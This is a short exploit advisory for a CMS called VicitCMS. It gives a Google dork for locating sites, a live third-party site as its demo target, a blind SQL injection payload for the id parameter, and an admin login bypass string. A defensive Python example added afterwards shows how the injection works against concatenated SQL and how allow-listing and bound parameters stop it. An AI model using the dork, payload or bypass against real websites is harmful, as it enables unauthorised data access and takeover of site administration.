*********************************************************
#Exploit Title: VicitCMS SQL Injection / Admin Panel bypass
#Date: 2022-01-30
#Exploit Author: K0uR0sH3R
#Google Dork: intext:"VicitCMS"
#Version: 1.0
#Vendor Homepage: vicitdigital.com
#Category: webapps
#Tested On: Windows 10, Firefox
### Demo : https://www.lakie1.com/currnetDogs1.php?id=49
POC :
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=49' AND 9212=9212 AND 'zHua'='zHua
---
Bypass : https://www.lakie1.com/login/ :::: User:'=''or' - Pass:'=''or'
*********************************************************
#TELEGRAM: K0uR0sH3R_info
#Email: K0uR0sH3R@gmail.com
*********************************************************
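
Added example, not part of the original advisory and not VicitCMS code: it shows why the id payload above is accepted when the GET value is concatenated into the query, and how an integer allow-list plus a bound parameter closes it. The dogs table, the function names and the quoted-concatenation query shape are assumptions, and SQLite stands in for the site's database, which the advisory does not name.

```python
import sqlite3

PAYLOAD = "49' AND 9212=9212 AND 'zHua'='zHua"  # payload string from the PoC above
SAFE_SQL = "SELECT name FROM dogs WHERE id = ?"

def make_db():
    # Constructed sample data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE dogs (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO dogs VALUES (?, ?)", [(49, "Rex"), (50, "Bella")])
    return db

def lookup_vulnerable(db, raw_id):
    # Assumed shape of the flaw: the GET value is pasted between quotes,
    # so a quote inside the value ends the literal and the rest runs as SQL.
    sql = "SELECT name FROM dogs WHERE id='" + raw_id + "'"
    return db.execute(sql).fetchall()

def lookup_hardened(db, raw_id):
    # 1) Allow-list: id must be a short, plain decimal integer.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("id must be a non-negative integer")
    # 2) Bound parameter: the value never becomes part of the SQL text.
    return db.execute(SAFE_SQL, (int(raw_id),)).fetchall()

def demo():
    db = make_db()
    results = {
        # Same row for the clean value and the payload: the injected
        # AND clauses were evaluated by the database.
        "normal": lookup_vulnerable(db, "49"),
        "injected": lookup_vulnerable(db, PAYLOAD),
        # Binding alone already treats the whole payload as one value.
        "bound_only": db.execute(SAFE_SQL, (PAYLOAD,)).fetchall(),
        "hardened_normal": lookup_hardened(db, "49"),
    }
    try:
        lookup_hardened(db, PAYLOAD)
        results["hardened_rejects"] = False
    except ValueError:
        results["hardened_rejects"] = True
    return results

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The same bound-parameter approach applies to the username and password fields of the login form named in the Bypass line.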